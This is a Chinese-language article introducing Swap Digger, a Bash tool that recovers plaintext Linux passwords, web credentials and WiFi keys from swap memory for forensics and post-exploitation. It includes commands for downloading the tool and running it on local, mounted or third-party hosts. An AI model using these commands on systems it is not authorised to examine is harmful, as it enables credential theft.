Swap Digger:一款功能強大的自動提取並尋找Linux使用者憑證的工具
今天給大家介紹的是一款名叫Swap Digger的工具,大家可以利用這款工具自動化搜尋並提取Linux使用者憑證、Web表單憑證、Web表單郵件、HTTP認證資料、WiFi SSID和金鑰等等。
Swap_Digger是一個Bash指令碼,它可以自動對目標Linux系統進行資料提取和分析,它不僅能給取證人員提供資料支援,而且還能給滲透測試人員提供後滲透階段所需的資訊。
下載並執行工具
在本地主機上開啟命令列終端,輸入下列命令下載並執行Swap_Digger指令碼:
alice@1nvuln3r4bl3:~$git cloneofollow,noindex" target="_blank">https://github.com/sevagas/swap_digger.git
alice@1nvuln3r4bl3:~$cd swap_digger
alice@1nvuln3r4bl3:~$chmod +x swap_digger.sh
alice@1nvuln3r4bl3:~$sudo ./swap_digger.sh -v
在載入的硬碟驅動器上,首先使用下列命令下載指令碼:
alice@1nvuln3r4bl3:~$git clonehttps://github.com/sevagas/swap_digger.git
alice@1nvuln3r4bl3:~$cd swap_digger
alice@1nvuln3r4bl3:~$chmod +x swap_digger.sh
接下來,尋找目標swap檔案/分割槽:
alice@1nvuln3r4bl3:~$sudo ./swap_digger.sh -S
最後,執行下列命令對目標進行分析:
alice@1nvuln3r4bl3:~$sudo ./swap_digger.sh -vx -r path/to/mounted/target/root/fs -spath/to/target/swap/device
在第三方裝置上,使用下列命令下載並執行指令碼(可用於滲透測試和CTF):
alice@1nvuln3r4bl3:~$wgethttps://raw.githubusercontent.com/sevagas/swap_digger/master/swap_digger.sh
alice@1nvuln3r4bl3:~$chmod +x swap_digger.sh
alice@1nvuln3r4bl3:~$sudo ./swap_digger.sh -vx
簡單執行
如果你只需要恢復出Linux使用者的明文密碼,可以直接執行下列命令:
alice@1nvuln3r4bl3:~$sudo ./swap_digger.sh
可用選項
./swap_digger.sh[ OPTIONS ] Options : -x, --extendedRun Extended tests on the target swap toretrieve other interesting data (web passwords, emails, wifi creds,most accessed urls, etc) -g, --guessingTry to guess potential passwords based onobservations and stats Warning: This option is not reliable,it may dig more passwords as well as hundreds false positives. -h, --helpDisplay this help. -v, --verbose Verbose mode. -l, --log Log all outputs in a log file(protected inside the generated working directory). -c, --clean Automatically erase the generatedworking directory at end of script (will also remove log file) -r PATH, --root-path=PATHLocation of the target file-system root(default value is /) Change this value for forensic analysiswhen target is a mounted file system. This option has tobe used along the -s option to indicate pathto swap device. -s PATH, --swap-path=PATHLocation of swap device or swap dump toanalyse Use this option for forensic/remoteanalysis of a swap dump or a mounted external swap partition. This option should be used with the -roption where at least /<root-path>/etc/shadow exists. -S, --swap-searchSearch for all available swap devices (usefor forensics).